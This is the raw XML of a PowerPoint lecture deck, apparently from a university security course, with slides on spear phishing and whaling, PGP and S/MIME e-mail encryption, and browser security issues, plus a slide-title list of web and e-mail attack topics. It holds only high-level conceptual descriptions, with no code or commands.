              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Details about that user's life or accounts might be included</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Whaling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a term used for spear phishing of rich people or celebrities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They have more money</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many of their personal details could be public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1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e-mail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PGP (Pretty Good Privacy) is a system that uses the encryption mechanisms we described to send safe e-mails</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The public key system uses a decentralized web of trust where you add your friends' keys to your web and get keys for their friends and friends of friends</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>S/MIME is a standard that is like PGP, but it uses hierarchies of trust based on certificates from central authorities instead of a web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="345221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e-mail attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OS security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Abiral</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Pokharel presents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7B2E2-1905-45D8-B229-A4526917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AFFB0-C2EB-4283-B54D-7A8462A320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694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5.1 and 5.2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Work on Assignment 3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Work on Project 2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9BBFD-7740-4466-BBE8-8097AEB4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Hussein Al-Ani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10A29-5ACB-4E70-AEB6-74DFA7EF45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– User Side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85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Browser security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Browsers are how most of the world interacts with the Internet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are lots of problems when trying to maintain security:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browsers often connect to more than just the URL listed in the address bar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fetching a page automatically fetches lots of other data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the browser is corrupted, you have no protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most browsers support plug-ins, which can be malicious or badly implemented</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browsers can access data on the user computer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The user does not know what data the browser is sending</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="83579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Browser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of an attack on a browser may be to get sensitive information or to install software on the user machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Approaches for attacking a browser:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attack the OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attack the browser itself or its plug-ins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intercept communication to or from the browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="281384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3047</TotalTime>
  <Words>1852</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>218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Assignment 3</vt:lpstr>
      <vt:lpstr>Project 2</vt:lpstr>
      <vt:lpstr>Hussein Al-Ani Presents</vt:lpstr>
      <vt:lpstr>Web Security – User Side</vt:lpstr>
      <vt:lpstr>Browser security issues</vt:lpstr>
      <vt:lpstr>Browser attacks</vt:lpstr>
      <vt:lpstr>Man-in-the-Browser</vt:lpstr>
      <vt:lpstr>Keystroke logging</vt:lpstr>
      <vt:lpstr>Page-in-the-middle</vt:lpstr>
      <vt:lpstr>Program download substitution</vt:lpstr>
      <vt:lpstr>CAPTCHAs</vt:lpstr>
      <vt:lpstr>User-in-the-middle</vt:lpstr>
      <vt:lpstr>Browser authentication issues</vt:lpstr>
      <vt:lpstr>Authentication approaches</vt:lpstr>
      <vt:lpstr>Web Attacks Targeting Users</vt:lpstr>
      <vt:lpstr>Defaced web site</vt:lpstr>
      <vt:lpstr>Fake website</vt:lpstr>
      <vt:lpstr>Protecting websites</vt:lpstr>
      <vt:lpstr>Substitute content</vt:lpstr>
      <vt:lpstr>Web bugs</vt:lpstr>
      <vt:lpstr>Clickjacking</vt:lpstr>
      <vt:lpstr>Obtaining user or website data</vt:lpstr>
      <vt:lpstr>Cross-site scripting</vt:lpstr>
      <vt:lpstr>SQL injection</vt:lpstr>
      <vt:lpstr>Dot-dot-slash</vt:lpstr>
      <vt:lpstr>Server-side include</vt:lpstr>
      <vt:lpstr>E-mail Attacks</vt:lpstr>
      <vt:lpstr>Fake e-mail</vt:lpstr>
      <vt:lpstr>Volume of spam</vt:lpstr>
      <vt:lpstr>Why do people send spam?</vt:lpstr>
      <vt:lpstr>Dealing with spam</vt:lpstr>
      <vt:lpstr>E-mail spoofing</vt:lpstr>
      <vt:lpstr>Phishing</vt:lpstr>
      <vt:lpstr>Secure e-mail systems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404</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-08-24T20:26:10Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-06T19:49:35Z</dcterms:modified>
</cp:coreProperties>
</file>